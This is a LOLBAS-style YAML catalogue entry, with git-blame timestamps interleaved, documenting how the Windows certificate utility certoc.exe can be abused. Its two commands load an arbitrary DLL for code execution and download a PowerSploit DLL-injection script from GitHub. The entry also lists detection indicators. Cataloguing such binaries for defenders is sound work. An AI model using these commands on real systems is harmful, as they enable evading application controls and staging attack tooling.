2021-10-07 12:31:45 +02:00
|
|
|
---
|
|
|
|
Name: CertOC.exe
|
|
|
|
Description: Used for installing certificates
|
|
|
|
Author: 'Ensar Samil'
|
2021-10-27 11:02:52 +02:00
|
|
|
Created: 2021-10-07
|
2021-10-07 12:31:45 +02:00
|
|
|
Commands:
|
|
|
|
- Command: certoc.exe -LoadDLL "C:\test\calc.dll"
|
|
|
|
Description: Loads the target DLL file
|
|
|
|
Usecase: Execute code within DLL file
|
|
|
|
Category: Execute
|
|
|
|
Privileges: User
|
|
|
|
MitreID: T1218
|
2021-10-27 11:02:52 +02:00
|
|
|
OperatingSystem: Windows Server 2022
|
|
|
|
- Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1
|
|
|
|
Description: Downloads text formatted files
|
|
|
|
Usecase: Download scripts, webshells etc.
|
|
|
|
Category: Download
|
|
|
|
Privileges: User
|
|
|
|
MitreID: T1105
|
2021-11-05 19:58:26 +01:00
|
|
|
OperatingSystem: Windows Server 2022
|
2021-10-07 12:31:45 +02:00
|
|
|
Full_Path:
|
|
|
|
- Path: c:\windows\system32\certoc.exe
|
|
|
|
- Path: c:\windows\syswow64\certoc.exe
|
2021-11-05 19:58:26 +01:00
|
|
|
Code_Sample:
|
2021-10-07 12:31:45 +02:00
|
|
|
- Code:
|
2021-11-05 19:58:26 +01:00
|
|
|
Detection:
|
2021-10-07 12:31:45 +02:00
|
|
|
- IOC: Process creation with given parameter
|
|
|
|
- IOC: Unsigned DLL load via certoc.exe
|
2021-10-27 11:02:52 +02:00
|
|
|
- IOC: Network connection via certoc.exe
|
2021-10-07 12:31:45 +02:00
|
|
|
Resources:
|
|
|
|
- Link: https://twitter.com/sblmsrsn/status/1445758411803480072?s=20
|
2021-10-27 11:02:52 +02:00
|
|
|
- Link: https://twitter.com/sblmsrsn/status/1452941226198671363?s=20
|
2021-10-07 12:31:45 +02:00
|
|
|
Acknowledgement:
|
|
|
|
- Person: Ensar Samil
|
|
|
|
Handle: '@sblmsrsn'
|
|
|
|
---
|